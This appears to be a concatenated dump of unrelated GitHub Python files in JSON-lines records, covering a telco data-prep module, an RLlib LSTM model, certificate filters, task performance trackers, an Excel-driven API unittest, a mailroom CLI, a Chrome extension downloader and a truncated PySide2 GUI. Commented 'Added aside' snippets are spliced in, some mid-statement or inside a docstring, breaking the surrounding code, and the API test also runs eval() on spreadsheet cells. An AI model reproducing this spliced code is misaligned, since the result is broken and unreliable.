more_than_two_labels(df, col):\n df[f'{col}_enc'] = np.where(df[col] == 'No', 0,\n np.where(df[col] == 'Yes', 1, 0))\n return df\n\n#### New Feature Functions ####\ndef months_to_years(df, col):\n df[f'{col}_years'] = (df[col] / 12).round(2)\n return df\n\ndef extra_lines(df):\n df['extra_lines'] = 
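# --- Added aside: a toy run of the nested np.where encoding used by the
# prepare.py helpers above (and by extra_lines just below). The tiny DataFrame
# is an assumed example, not the telco data.
import numpy as np
import pandas as pd

toy = pd.DataFrame({'multiple_lines': ['Yes', 'No', 'No phone service']})
toy['extra_lines'] = np.where(toy['multiple_lines'] == 'Yes', 2,
                     np.where(toy['multiple_lines'] == 'No', 1, 0))
print(toy['extra_lines'].tolist())  # -> [2, 1, 0]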
np.where(df['multiple_lines'] == 'Yes', 2,\n np.where(df['multiple_lines'] == 'No', 1, 0))\n return df\n\ndef family_support(df):\n df['family_support'] = np.where( (df['partner'] == 'No') & (df['dependents'] == 'Yes'), 3,\n np.where( (df['partner'] == 'Yes') & (df['dependents'] == 'Yes'), 2,\n np.where( (df['partner'] == 'Yes') & (df['dependents'] == 'No'), 1, 0)))\n return df\n\ndef has_internet(df):\n df['has_internet'] = np.where(df.internet_service_type_id == 3, 0, 1)\n return df\n\ndef internet_services(df):\n df['internet_services'] = (df.has_internet + \n df.online_security_enc + \n df.online_backup_enc + \n df.tech_support_enc + \n df.streaming_tv_enc + \n df.streaming_movies_enc + \n df.device_protection_enc)\n return df\n\n#### Scaler Function ####\ndef uniform_scaler(train, valid, test):\n '''\n Uses the train, valid & test datasets created by the split_my_data function\n First, make new dfs containing only those columns you want scaled, else this function will scale every numerical value, including booleans.\n\n This is a non-linear transformer, and it smooths out unusual distributions.\n It spreads out the most frequent values and reduces the impact of (marginal) outliers, therefore it is robust.\n It distorts correlations and distances within and across features.\n\n '''\n unf_scaler = preprocessing.QuantileTransformer(n_quantiles=100, output_distribution='normal', random_state=123, copy=True).fit(train)\n train = pd.DataFrame(unf_scaler.transform(train), columns=train.columns.values).set_index([train.index.values])\n valid = pd.DataFrame(unf_scaler.transform(valid), columns=valid.columns.values).set_index([valid.index.values])\n test = pd.DataFrame(unf_scaler.transform(test), columns=test.columns.values).set_index([test.index.values])\n return unf_scaler, train, valid, test\n","repo_name":"team-db-telco/telco-classification-project","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74870763300","text":"from ray.rllib.models.modelv2 import ModelV2\nfrom ray.rllib.models.tf.recurrent_tf_modelv2 import RecurrentTFModelV2\nfrom ray.rllib.policy.rnn_sequencing import add_time_dimension\nfrom ray.rllib.utils import try_import_tf\nfrom ray.rllib.utils.annotations import override\n\nfrom models.actor_critic_lstm import ActorCriticLSTM\nfrom models.common_layers import build_conv_layers, build_fc_layers\n\ntf = try_import_tf()\n\n\nclass BaselineModel(RecurrentTFModelV2):\n def __init__(self, obs_space, action_space, num_outputs, model_config, name):\n \"\"\"\n The baseline model without social influence from the social influence paper.\n :param obs_space: The observation space shape.\n :param action_space: The amount of available actions to this agent.\n :param num_outputs: The amount of available actions to this agent.\n :param model_config: The model config dict. 
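# --- Added aside: the fit-on-train-only pattern behind uniform_scaler() above.
# Fitting the QuantileTransformer on the training split and reusing the fitted
# object on held-out data avoids leaking their distributions into the scaler;
# the arrays here are made up for the demo.
import numpy as np
from sklearn.preprocessing import QuantileTransformer

rng = np.random.default_rng(0)
train, test = rng.random((100, 2)), rng.random((20, 2))
qt = QuantileTransformer(n_quantiles=50, output_distribution='normal').fit(train)
train_scaled, test_scaled = qt.transform(train), qt.transform(test)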
Used to determine size of conv and fc layers.\n :param name: The model name.\n \"\"\"\n super(BaselineModel, self).__init__(obs_space, action_space, num_outputs, model_config, name)\n\n self.obs_space = obs_space\n self.num_outputs = num_outputs\n\n original_obs_dims = obs_space.original_space.spaces[\"curr_obs\"].shape\n # Determine vision network input shape: add an extra none for the time dimension\n inputs = tf.keras.layers.Input(shape=original_obs_dims, name=\"observations\", dtype=tf.uint8)\n\n # Divide by 255 to transform [0,255] uint8 rgb pixel values to [0,1] float32.\n last_layer = tf.keras.backend.cast(inputs, tf.float32)\n last_layer = tf.math.divide(last_layer, 255.0)\n\n # Build the CNN layers\n last_layer = build_conv_layers(model_config, last_layer)\n\n # Add the fully connected layers\n last_layer = build_fc_layers(model_config, last_layer, name)\n\n self.encoder_model = tf.keras.Model(inputs, [last_layer], name=\"Baseline_Encoder_Model\")\n self.register_variables(self.encoder_model.variables)\n self.encoder_model.summary()\n\n # Action selection/value function\n cell_size = model_config[\"custom_options\"].get(\"cell_size\")\n self.policy_model = ActorCriticLSTM(\n last_layer.shape[-1],\n action_space,\n num_outputs,\n model_config,\n \"policy\",\n cell_size=cell_size,\n )\n\n self.register_variables(self.policy_model.rnn_model.variables)\n self.policy_model.rnn_model.summary()\n\n @override(ModelV2)\n def forward(self, input_dict, state, seq_lens):\n \"\"\"\n Evaluate the model.\n Adds time dimension to batch before sending inputs to forward_rnn()\n :param input_dict: The input tensors.\n :param state: The model state.\n :param seq_lens: LSTM sequence lengths.\n :return: The policy logits and state.\n \"\"\"\n trunk = self.encoder_model(input_dict[\"obs\"][\"curr_obs\"])\n new_dict = {\"curr_obs\": add_time_dimension(trunk, seq_lens)}\n\n output, new_state = self.forward_rnn(new_dict, state, seq_lens)\n return tf.reshape(output, [-1, self.num_outputs]), new_state\n\n def forward_rnn(self, input_dict, state, seq_lens):\n \"\"\"\n Forward pass through the LSTM.\n Implicitly assigns the value function output to self_value_out, and does not return this.\n :param input_dict: The input tensors.\n :param state: The model state.\n :param seq_lens: LSTM sequence lengths.\n :return: The policy logits and new state.\n \"\"\"\n h1, c1 = state\n\n # Compute the next action\n (\n self._model_out,\n self._value_out,\n output_h1,\n output_c1,\n ) = self.policy_model.forward_rnn(input_dict, [h1, c1], seq_lens)\n\n return self._model_out, [output_h1, output_c1]\n\n def action_logits(self):\n \"\"\"\n :return: The action logits from the latest forward pass.\n \"\"\"\n return self._model_out\n\n def value_function(self):\n \"\"\"\n :return: The value function result from the latest forward pass.\n \"\"\"\n return tf.reshape(self._value_out, [-1])\n\n @override(ModelV2)\n def get_initial_state(self):\n \"\"\"\n :return: Initial state of this model. 
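# --- Added aside: a minimal sketch of the encoder pattern used above. The real
# build_conv_layers()/build_fc_layers() helpers are project code not shown in
# this record, and the observation shape is an assumption; only the
# uint8 -> [0, 1] float normalization and the conv/dense trunk are illustrated.
import tensorflow as tf

obs = tf.keras.layers.Input(shape=(15, 15, 3), dtype=tf.uint8)
h = tf.math.divide(tf.keras.backend.cast(obs, tf.float32), 255.0)
h = tf.keras.layers.Conv2D(6, 3, activation='relu')(h)
h = tf.keras.layers.Flatten()(h)
h = tf.keras.layers.Dense(32, activation='relu')(h)
encoder = tf.keras.Model(obs, h, name='toy_encoder')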
This model only has LSTM state from the policy_model.\n \"\"\"\n return self.policy_model.get_initial_state()\n","repo_name":"eugenevinitsky/sequential_social_dilemma_games","sub_path":"models/baseline_model.py","file_name":"baseline_model.py","file_ext":"py","file_size_in_byte":4420,"program_lang":"python","lang":"en","doc_type":"code","stars":354,"dataset":"github-code","pt":"35"} +{"seq_id":"5541997978","text":"from certificate import *\nfrom chandlerdb.item.Item import Item\n\nclass TrustedCACertsFilter(Item):\n def isTrustedCACert(self, view, uuid):\n purpose, trust = view.findValues(uuid, ('purpose', 0), ('trust', 0))\n return purpose & constants.PURPOSE_CA and \\\n trust & constants.TRUST_AUTHENTICITY | constants.TRUST_SERVER\n\nclass TrustedServerCertsFilter(Item):\n def isTrustedServerCert(self, view, uuid):\n purpose, trust = view.findValues(uuid, ('purpose', 0), ('trust', 0))\n return purpose & constants.PURPOSE_SERVER and \\\n trust & constants.TRUST_AUTHENTICITY\n\ndef installParcel(parcel, oldVersion=None):\n # load our subparcels\n from application import schema\n schema.synchronize(parcel.itsView, \"osaf.framework.certstore.data\")\n schema.synchronize(parcel.itsView, \"osaf.framework.certstore.blocks\")\n\n from osaf.pim.collections import FilteredCollection\n import certificate, utils\n\n FilteredCollection.update(parcel, 'sslCertificateQuery',\n source=utils.getExtent(certificate.Certificate, parcel.itsView),\n filterMethod=(TrustedCACertsFilter(None, parcel), 'isTrustedCACert'),\n filterAttributes=['purpose', 'trust']\n )\n \n FilteredCollection.update(parcel, 'sslTrustedServerCertificatesQuery',\n source=utils.getExtent(certificate.Certificate, parcel.itsView),\n filterMethod=(TrustedServerCertsFilter(None, parcel),\n 'isTrustedServerCert'),\n filterAttributes=['purpose', 'trust']\n )\n","repo_name":"owenmorris/chandler","sub_path":"chandler/parcels/osaf/framework/certstore/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"35"} +{"seq_id":"11404419770","text":"from __future__ import absolute_import, division\n\nfrom collections import OrderedDict\n\nfrom . 
import utils\n\nclass DefaultPerformance(object):\n def __init__(self):\n pass\n\n def update(self, trial, status):\n pass\n\n def display(output=True):\n pass\n\nclass Performance2AFC(object):\n def __init__(self):\n self.decisions = []\n self.corrects = []\n self.choices = []\n self.t_choices = []\n #self.rewards = []\n\n def update(self, trial, status):\n #self.rewards.append(reward)\n if 'correct' in status:\n self.decisions.append(True)\n self.corrects.append(status['correct'])\n if 'choice' in status:\n self.choices.append(status['choice'])\n else:\n self.choices.append(None)\n if 't_choice' in status:\n self.t_choices.append(status['t_choice'])\n else:\n self.t_choices.append(None)\n else:\n self.decisions.append(False)\n self.corrects.append(False)\n self.choices.append(None)\n self.t_choices.append(None)\n\n @property\n def n_trials(self):\n return len(self.decisions)\n\n @property\n def n_decision(self):\n return sum(self.decisions)\n\n @property\n def n_correct(self):\n return sum(self.corrects)\n\n def display(self, output=True):\n n_trials = self.n_trials\n n_decision = self.n_decision\n n_correct = self.n_correct\n\n items = OrderedDict()\n items['P(choice)'] = '{}/{} = {:.3f}'.format(n_decision, n_trials,\n n_decision/n_trials)\n if n_decision > 0:\n items['P(correct|choice)'] = '{}/{} = {:.3f}'.format(n_correct, n_decision,\n n_correct/n_decision)\n\n if output:\n utils.print_dict(items)\n return items\n\nclass PerformancePostdecisionWager(object):\n def __init__(self):\n self.wagers = []\n self.corrects = []\n self.choices = []\n self.t_choices = []\n\n def update(self, trial, status):\n self.wagers.append(trial['wager'])\n self.corrects.append(status.get('correct'))\n self.choices.append(status.get('choice'))\n self.t_choices.append(status.get('t_choice'))\n\n @property\n def n_correct(self):\n return sum([c for c in self.corrects if c is not None])\n\n @property\n def n_sure_decision(self):\n return len([1 for w, c in zip(self.wagers, self.choices) if w and c is not None])\n\n @property\n def n_trials(self):\n return len(self.choices)\n\n @property\n def n_decision(self):\n return len([1 for c in self.choices if c in ['L', 'R']])\n\n @property\n def n_sure(self):\n return len([1 for c in self.choices if c == 'S'])\n\n @property\n def n_answer(self):\n return len([1 for c in self.choices if c is not None])\n\n @property\n def n_wager(self):\n return sum(self.wagers)\n\n def display(self, output=True):\n n_trials = self.n_trials\n n_decision = self.n_decision\n n_correct = self.n_correct\n n_sure_decision = self.n_sure_decision\n n_sure = self.n_sure\n n_answer = self.n_answer\n n_wager = self.n_wager\n\n items = OrderedDict()\n items['P(answer)'] = '{}/{} = {:.3f}'.format(n_answer, n_trials,\n n_answer/n_trials)\n items['P(decision)'] = '{}/{} = {:.3f}'.format(n_decision, n_trials,\n n_decision/n_trials)\n if n_decision > 0:\n items['P(correct|decision)'] = '{}/{} = {:.3f}'.format(n_correct, n_decision,\n n_correct/n_decision)\n items['P(wager trials)'] = '{}/{} = {:.3f}'.format(n_wager, n_trials,\n n_wager/n_trials)\n if n_sure_decision > 0:\n items['P(sure)'] = '{}/{} = {:.3f}'.format(n_sure, n_sure_decision,\n n_sure/n_sure_decision)\n\n if output:\n utils.print_dict(items)\n return items\n","repo_name":"frsong/pyrl","sub_path":"pyrl/performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"1231926654","text":"# 
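# --- Added aside: minimal usage of the Performance2AFC tracker defined above.
# The status dicts are assumed examples of what a task runner would pass in.
perf = Performance2AFC()
perf.update(trial={}, status={'correct': True, 'choice': 'L', 't_choice': 120})
perf.update(trial={}, status={})  # trial with no decision
perf.display()  # prints P(choice) = 1/2 = 0.500 and P(correct|choice) = 1/1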
-*-coding:utf-8-*-\n# @Time :2023/10/24 15:14\n# @Author :Ervin Chiu\n# @Email :ErvinChiu@outlook.com\n# @File :api_demo.py\n# @Software:PyCharm\n\nimport requests\n\n# GET request\n\n#res = requests.get(\"https://www.baidu.com\")\n#print(res)\n#print(res.request.headers)\n# print(res.status_code)\n\n# http://150.109.156.47:8000/api/get_event_list/?eid=3\n\n\n# url = \"http://150.109.156.47:8000/api/get_event_list\"\n# param = {\"eid\": \"3\"}\n# res = requests.get(url, param)\n# print(res.json())\n\n\nimport unittest\n\nfrom http_request import HttpRequest\n\nfrom ddt import ddt, data\n\nfrom do_excel import DoExcel\n\n#\n# class TestHttpRequest(unittest.TestCase):\n#\n# def test_case_00(self):\n# url = \"http://150.109.156.47:8000/api/get_event_list\"\n# param = {\"eid\": \"1\"}\n# res = HttpRequest(url, param).http_request(\"get\")\n# print(\"Result of test case 1: {0}\".format(res.json()))\n#\n# def test_case_01(self):\n# url = \"http://150.109.156.47:8000/api/get_event_list\"\n# param = {\"eid\": \"2\"}\n# res = HttpRequest(url, param).http_request(\"get\")\n# print(\"Result of test case 2: {0}\".format(res.json()))\n#\n# def test_case_02(self):\n# url = \"http://150.109.156.47:8000/api/get_event_list\"\n# param = {\"eid\": \"3\"}\n# res = HttpRequest(url, param).http_request(\"get\")\n# print(\"Result of test case 3: {0}\".format(res.json()))\n#\n# def test_case_03(self):\n# url = \"http://150.109.156.47:8000/api/get_event_list\"\n# param = {\"eid\": \"6\"}\n# res = HttpRequest(url, param).http_request(\"get\")\n# print(\"Result of test case 4: {0}\".format(res.json()))\n#\n#\n# if __name__ == '__main__':\n# unittest.main()\n\n\n# test_data = [{\"id\":\"1\",\"url\": \"http://150.109.156.47:8000/api/get_event_list\", \"params\": {\"eid\": \"1\"}, \"method\": \"get\"},\n# {\"id\":\"2\",\"url\": \"http://150.109.156.47:8000/api/get_event_list\", \"params\": {\"eid\": \"2\"}, \"method\": \"get\"},\n# {\"id\":\"3\",\"url\": 'http://150.109.156.47:8000/api/get_event_list', 'params': {'eid': \"3\"}, \"method\": \"get\"}]\n# #\n#\n# @ddt\n# class TestHttpRequest(unittest.TestCase):\n#\n# @data(*test_data)\n# def test_case_01(self, data_item):\n# print(\"**********\" * 10)\n# print(\"Data unpacked by ddt: {0}\".format(data_item))\n#\n# res = HttpRequest(data_item[\"url\"], data_item[\"param\"]).http_request(data_item[\"method\"])\n# print(\"Result of the first test case: {0}\".format(res.json()))\n#\n#\n# if __name__ == '__main__':\n# unittest.main()\n\n\ntest_data = DoExcel(\"data.xlsx\", \"Sheet1\").do_excel()\n\n\n@ddt\nclass TestHttpRequest(unittest.TestCase):\n def setUp(self) -> None:\n self.t = DoExcel(\"data.xlsx\", \"Sheet1\")\n\n @data(*test_data)\n def test_case_01(self, data_item):\n print(\"**********\" * 20)\n print(\"Data unpacked by ddt: {0}\".format(data_item))\n\n res = HttpRequest(data_item[\"url\"], eval(data_item[\"params\"])).http_request(data_item[\"method\"])\n print(\"Result of test case {1}: {0}\".format(res.json(), data_item[\"id\"]))\n try:\n self.assertEqual(res.json()[\"status\"], 10200)\n\n test_result = \"Pass\"\n except AssertionError as e:\n print(\"API test raised an error: {0}\".format(e))\n\n test_result = \"Fail\"\n # raise e\n\n finally:\n self.t.write_back(data_item[\"id\"] + 1, 7, str(res.json()))\n self.t.write_back(data_item[\"id\"] + 1, 8, test_result)\n\n def tearDown(self) -> None:\n print(\"Test finished!\")\n\n\nif __name__ == '__main__':\n 
unittest.main()\n","repo_name":"ErvinChiu/guest3","sub_path":"api_demo.py","file_name":"api_demo.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"115649250","text":"##!/usr/bin/env python3\n\n#+----------------------------------------------+\n#| Mailroom Part 5 (Object Oriented) - Lesson 9 |\n#+----------------------------------------------+\n\n\nimport sys, os.path\n# import donor_models # data and model object go into that module - use explicit donor_models. namespace\nfrom donor_models import * # use implicit module namespace\n\n\n# current directory for file operations\ncur_dir = os.getcwd()\n\n\nprompt = \"\\n\".join((\"> Welcome to the donation Manager!\",\n \"Please choose from below options:\",\n \"1 - Send a Thank You\",\n \"2 - Print Report\", \n \"3 - Send letters to all Donors\",\n \"4 - Exit\",\n \">>> \"))\n\n# ======== Main functions ===============\n\ndef getmydir():\n return cur_dir\n\ndef safe_input(prompt = ''):\n try:\n result = input(prompt+\"\\n\")\n except (KeyboardInterrupt, EOFError):\n result = None\n return result\n\n\n# cli \ndef get_name(donors):\n\n np = \"> Enter new Donor's Full Name, type 'list' to see all Donors:\\n>>> \"\n name = safe_input(np) # input errors\n while name.lower() == \"list\":\n # create_report()\n # print_list()\n print(donors.list)\n name=safe_input(np) # input errors\n return(name.title())\n\n\n# cli\ndef get_amount(): # add error handling on not numbers, and input errors\n \n np = \"> Enter a Donation amount:\\n>>> \"\n try:\n amt = float(safe_input(np)) # input errors\n except (ValueError):\n print(\"Not valid amount\")\n amt = 0 \n \n while amt <= 0 :\n try:\n amt = float(safe_input(np)) # input errors\n except (ValueError):\n print(\"Not valid amount\")\n amt = 0 \n \n return(amt)\n\n\n# === Functions for the Main Menu\n\ndef send_thankyou(donors):\n new_name = get_name(donors)\n new_amount = get_amount()\n resstr = donors.add_donation(new_name, new_amount)\n print(resstr)\n\ndef create_report(donors): \n print(donors.report)\n \n\ndef send_letters(donors):\n print(donors.send_letters())\n\n# cli\ndef exit_program(donors):\n print(\"Good Bye...\")\n sys.exit(0)\n\n# cli\nmain_args = {\n 1: send_thankyou, # done\n 2: create_report, # done\n 3: send_letters,\n 4: exit_program} # done\n\n\n\ndef main_program(): # main loop\n # comment out before submission\n os.chdir(cur_dir) # change to my working directory\n \n # Create Donors and populate\n donors = DonorCollection()\n donors.add(Donor(\"Albert Einstein\", [1535.2, 15]))\n donors.add(Donor(\"Richard Feinman\", [150, 17]))\n donors.add(Donor(\"Lev Landau\", [53, 121, 35, 79]))\n donors.add(Donor(\"Niels Bohr\", [135.2, 15]))\n donors.add(Donor(\"Ilya Prigogine\", [15.2, 10]))\n \n # print(donors) # sanity check\n \n while True:\n try: # Error handling on range and input errors\n response = int(safe_input(prompt)) # continuously collect user selection\n except(ValueError):\n print(\"Input error!\") \n response = 0\n \n if response in main_args:\n main_args.get(response)(donors) # execute option from main_args passing the donors collection object as a parameter\n else:\n print(\"Not a valid option!\") \n \nif __name__ == \"__main__\":\n 
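# --- Added aside: the dict-dispatch pattern used by main_args above, shrunk to
# a self-contained toy (the handlers and the chosen option are stand-ins, not
# the mailroom functions):
def _greet(donors): print("hello", donors)
def _leave(donors): print("bye", donors)

handlers = {1: _greet, 2: _leave}
response = 1  # assumed user selection
handlers.get(response, lambda _: print("Not a valid option!"))("demo")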
main_program()\n","repo_name":"UWPCE-PythonCert-ClassRepos/SP_Online_PY210","sub_path":"students/stan_slov7/lesson09/cli_main.py","file_name":"cli_main.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"12816204490","text":"#FileNotFound\n# with open(\"a_file.txt\") as file:\n# fuile.read()\n\ntry:\n file = open(\"a_file.txt\")\n a_dictionary = {\"key\": \"value\"}\n # print(a_dictionary[\"sadf\"])\nexcept FileNotFoundError:\n open(\"a_file.txt\", \"w\")\n print(\"We did't find a_file.txt, creating one.\")\nexcept KeyError as error_message:\n print(\"The key {} does not exist\" .format(error_message))\nelse: \n content = file.read()\n print(content)\nfinally:\n file.close()\n print(\"file was closed\")\n\n# KeyError \n# a_dictionary = {\"key\":\"value\"}\n# value = a_dictionary[\"non_existent_key\"]\n\n# type KeyError\n# text = \"abc\"\n# print(text + 5)","repo_name":"Sanj-1873/100DaysOfPython","sub_path":"Day_21/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29581621447","text":"from utils import DataFiles\nimport collections\nimport numpy as np\n\ndataFiles = DataFiles(__file__)\n\ninput = dataFiles.input\ninputEX = dataFiles.inputEX\n\ninp = input[:]\n\nvents = [[[int(y) for y in x.split(\",\")] for x in ln.split(\" -> \")] for ln in inp]\n\nmap = collections.defaultdict(int)\n\nfor (x1, y1), (x2, y2) in vents:\n if (x1 == x2) or (y1 == y2):\n dx = x1 != x2\n dy = y1 != y2\n r = abs(x2 - x1) + abs(y2 - y1) + 1\n for k in range(r):\n map[min(x1, x2) + k * dx, min(y1, y2) + k * dy] += 1\n\nprint(\"Part 1:\", sum(1 for x in map.values() if x > 1))\n\nfor (x1, y1), (x2, y2) in vents:\n if (x1 != x2) and (y1 != y2):\n dx = np.sign(x2 - x1)\n dy = np.sign(y2 - y1)\n r = abs(x2 - x1) + 1\n for k in range(r):\n map[x1 + dx * k, y1 + dy * k] += 1\n\nprint(\"Part 2:\", sum(1 for x in map.values() if x > 1))\n","repo_name":"iulianxpopa/AdventOfCode","sub_path":"2021/code/Day05.py","file_name":"Day05.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13712084773","text":"#!/usr/bin/python3\nimport os\nimport sys\nimport json\nFILE = \"/usr/lib/zabbix/externalscripts/downdetectorlist.list\"\n\nif not os.path.isfile(FILE):\n print(\"File not found\")\n sys.exit()\n\nfile = open(FILE, \"r\")\n\ndata = {\n \"data\": []\n}\n\nfor line in file.readlines():\n line_data = line.rstrip().split(';')\n if line_data[0] == '1':\n dic = {\"{#SITE_ID}\": line_data[1], \"{#SITE_NOME}\": line_data[2]}\n data['data'].append(dic)\n\nprint(json.dumps(data))","repo_name":"gtkpad/downdetector_scrapper","sub_path":"downdetectorDiscovery.py","file_name":"downdetectorDiscovery.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"35"} +{"seq_id":"14156488436","text":"\"\"\"\nThis module can be used to download (Chrome) extensions from the extension store.\n\"\"\"\nimport json\nimport os\n\nimport requests\nimport zipfile\n\nfrom extensionstores import GetExtensionInfoError\n\n\ndef get_extension_manifest(extension_id: str) -> dict:\n\t\"\"\"\n\tGet the extension manifest of a Chrome extension.\n\n\t:param extension_id: The id of the extension.\n\t:return: The manifest as 
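# --- Added aside: execution order of try/except/else/finally, as exercised by
# the a_file.txt snippet above. `else` runs only if the try body raised
# nothing; `finally` always runs, even after an except handler.
try:
    value = int("42")
except ValueError:
    print("bad input")      # skipped: no exception was raised
else:
    print("parsed", value)  # runs: the try body succeeded
finally:
    print("always runs")    # runs in every case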
dictionary.\n\t\"\"\"\n\tdirectory_name = \"results/downloaded_extensions/\"\n\tfile_path = download_chrome_extension(extension_id, directory_name)\n\treturn _extract_manifest_from_extension(file_path)\n\n\ndef download_chrome_extension(extension_id: str, download_directory: str) -> str:\n\t\"\"\"\n\tDownload the crx/zip file of a Chrome extension (if file does not exist yet).\n\n\t:param download_directory: Name of the directory to save the extension in.\n\t:param extension_id: The ID of the extension to download\n\t:return: Path to the downloaded file\n\t\"\"\"\n\tfile_path = f\"{download_directory}{extension_id}.zip\"\n\tif not os.path.exists(download_directory):\n\t\tos.mkdir(download_directory)\n\n\tif os.path.isfile(file_path):\n\t\treturn file_path\n\n\tdownload_url = f\"https://clients2.google.com/service/update2/crx?response=redirect&os=linux&arch=x86-64&os_arch=x86-64&nacl_arch=x86-64&prod=chromiumcrx&prodchannel=unknown&prodversion=52.0.2743.116&acceptformat=crx2,crx3&x=id%3D{extension_id}%26uc\"\n\tresponse = requests.get(download_url, timeout=20.0, stream=True)\n\tif response.status_code == 200:\n\t\twith open(file_path, \"wb\") as fd:\n\t\t\tfor chunk in response.iter_content(chunk_size=512):\n\t\t\t\tfd.write(chunk)\n\t\t\treturn file_path\n\telse:\n\t\traise GetExtensionInfoError(f\"Error: Cannot download crx file for extension {extension_id}\")\n\n\ndef _extract_manifest_from_extension(extension_path: str):\n\twith zipfile.ZipFile(extension_path, \"r\") as zip_ref:\n\t\tmanifest = zip_ref.read(\"manifest.json\")\n\t\treturn json.loads(manifest)\n","repo_name":"chrrel/extensions","sub_path":"analysis/extensiondownloader.py","file_name":"extensiondownloader.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"13789115297","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 30 00:58:48 2018\r\n\r\n@author: navi_\r\n\"\"\"\r\n\r\nimport nltk\r\nfrom split_articles import split_into_articles\r\nfrom condentropy import getSentences\r\nfrom write import writeList\r\n\r\ndef get_capital_letter_words(words):\r\n cap_let_word = ''\r\n for i in range(len(words)):\r\n if (' '.join(words[:i+1]).istitle() or ' '.join(words[:i+1]).isupper()) and words[i].isalnum():\r\n cap_let_word = ' '.join(words[:i+1])\r\n i += 1\r\n else:\r\n break\r\n if len(words[i:])<2:\r\n return [cap_let_word]\r\n else:\r\n return [cap_let_word] + get_capital_letter_words(words[i+1:])\r\n\r\nif __name__=='__main__':\r\n articles = split_into_articles('C:\\\\Users\\\\navi_\\\\Dropbox\\\\NLP\\\\Corpus\\\\e960401.htm')\r\n \r\n sentences = []\r\n \r\n for a in articles:\r\n sents = getSentences(a)\r\n for s in sents:\r\n sentences.append(s)\r\n\r\n cl_words = []\r\n for s in sentences:\r\n words = nltk.word_tokenize(s)\r\n cl_words = cl_words + get_capital_letter_words(words)\r\n cl_words = sorted(set(cl_words))\r\n \r\n writeList(cl_words, 'name_entity.txt')\r\n","repo_name":"IvanNolasco/Natural-Language-Processing","sub_path":"name_entity.py","file_name":"name_entity.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20239095080","text":"# 485. Max Consecutive Ones\n\n# Given a binary array nums, return the maximum number of consecutive 1's in the array.\n\n# Example 1:\n# Input: nums = [1,1,0,1,1,1]\n# Output: 3\n# Explanation: The first two digits or the last three digits are consecutive 1s. 
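# --- Added aside: sketch of calling the downloader defined above. The id below
# is a placeholder, not a real extension id from the source; the calls are kept
# commented out because they perform a network request. A second call with the
# same id should hit the os.path.isfile() early return and skip the download.
# crx_path = download_chrome_extension("<extension-id>", "results/downloaded_extensions/")
# manifest = get_extension_manifest("<extension-id>")
# print(manifest.get("name"), manifest.get("manifest_version"))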
The maximum number of consecutive 1s is 3.\n\n# Example 2:\n# Input: nums = [1,0,1,1,0,1]\n# Output: 2\n\nfrom typing import List\n\n\nclass Solution:\n\n def findMaxConsecutiveOnes(self, nums: List[int]) -> int:\n res = 0\n slow = 0\n fast = slow\n while slow < len(nums):\n while fast < len(nums) and nums[fast] == 1:\n fast = fast + 1\n\n if fast - slow > res:\n res = fast - slow\n\n slow = slow + 1\n fast = slow\n\n return res\n\n\n# test\nsolution = Solution()\nres = solution.findMaxConsecutiveOnes([1, 1, 0, 1, 1, 1])\nprint(res)\n","repo_name":"HarryXiong24/code-collection","sub_path":"Data Structure & Algorithm/Algorithm/Two Point/en/Fast & Slow/485. Max Consecutive Ones/485. Max Consecutive Ones.py","file_name":"485. Max Consecutive Ones.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"19"} +{"seq_id":"32030823063","text":"from PySide2 import QtCore, QtGui\r\nfrom PySide2.QtCore import Signal, Slot, QTimer\r\nfrom PySide2.QtWidgets import QApplication, QMainWindow, QGridLayout, QComboBox, \\\r\n QTableWidget, QTableWidgetItem, QMenu, QMenuBar, QStatusBar, QAction, \\\r\n QFileDialog, QLineEdit, QPushButton, QCheckBox, QMessageBox, QVBoxLayout, \\\r\n QTabWidget, QHBoxLayout, QWidget, QHeaderView, QLabel, QDialog\r\nimport sys\r\nfrom EquipmentHandler import EquipmentHandler\r\nfrom configparser import ConfigParser\r\nimport pyqtgraph as pg\r\n\r\nclass MainWindow(QMainWindow):\r\n def __init__(self, config_file):\r\n super(MainWindow, self).__init__()\r\n self.config_file = config_file\r\n\r\n self.setObjectName(\"MainWindow\")\r\n self.setWindowTitle(\"Data Acquisition System V1\")\r\n self.resize(1024, 1024)\r\n self.centralwidget = QWidget(self)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.gridLayout = QGridLayout(self.centralwidget)\r\n self.gridLayout.setObjectName(\"gridLayout\")\r\n self.gridLayout.setSpacing(10)\r\n self.dataPlot = pg.PlotWidget(self.centralwidget)\r\n self.dataPlot.setObjectName(\"dataPlot\")\r\n # self.dataPlot.setGeometry(0, 0, 1024, 600)\r\n self.dataPlot.resize(1420,820)\r\n self.gridLayout.addWidget(self.dataPlot, 0, 0)\r\n\r\n\r\n self.tab_widget = QTabWidget()\r\n self.setCentralWidget(self.tab_widget)\r\n self.tab_widget.setTabPosition(QTabWidget.North)\r\n # self.tab_widget.setMovable(True)\r\n self.gridLayout.addWidget(self.tab_widget, 1, 0)\r\n\r\n # Read the configuration file\r\n self.config = ConfigParser()\r\n 